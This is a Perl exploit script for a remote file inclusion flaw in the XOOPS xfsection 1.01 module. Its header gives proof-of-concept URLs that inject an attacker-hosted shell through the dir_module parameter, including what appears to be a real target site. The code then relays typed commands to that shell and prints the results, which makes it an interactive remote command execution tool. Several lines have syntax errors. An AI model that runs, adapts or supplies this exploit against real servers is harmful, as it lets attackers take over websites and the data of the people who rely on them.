#!/usr/bin/perl sub header() { print q { ========================================================================= XOOPS modules xfsection 1.01 =>Remote File Inclusion Exploit Exploit Coded by fl0 fl0w flo_flow_supremacy[at]yahoo[dot]com PoC:http://site.com/modules/xfsection/modify.php?dir_module=evilShell? Demo:http://www.homu.net/modules/xfsection/modify.php?dir_module=SHELL? ========================================================================= } } sub routine() { header(); print q { ====================================================================================================== USAGE: perl exploit.pl EXAMPLE: perl [localhost\][path] exploit.pl http://site.com/ ====================================================================================================== }; exit(); } use LWP::UserAgent; $site=@ARGV[0]; $shells=@ARGV[1]; $shellcmd=@ARGV[2]; if($site!~/http:\/\// || $site!~/http:\/\// || !$shells) { routine() } header(); while() { print"[shell] \$"; while() { $cmd=$_; chomp($cmd); $sploit=LWP::UserAgent->new() or die; $requesting=HTTP::Request->new(GET=>$site.'/modules/xfsection/modify.php?dir_module='.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n"; $re=$sploit->request(requesting); $i=$re->content; $i=~tr/[\n]/[ê]/; if(!$cmd) { print "Enter a command\n\n"; $i=""; } elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in / ) { print "\nCould NOT connect to cmd from host \n"; exit; } elsif($i=~/^.WARNING/) { print "\nInvalid command\n\n"; }; if($i=~/(.+).WARNING.(.+).WARNING/) { $last=$1; $last=~tr/[&234;]/[\n]/; print "\n$last\n"; last; } else { print "[shell] \$"; } } } last;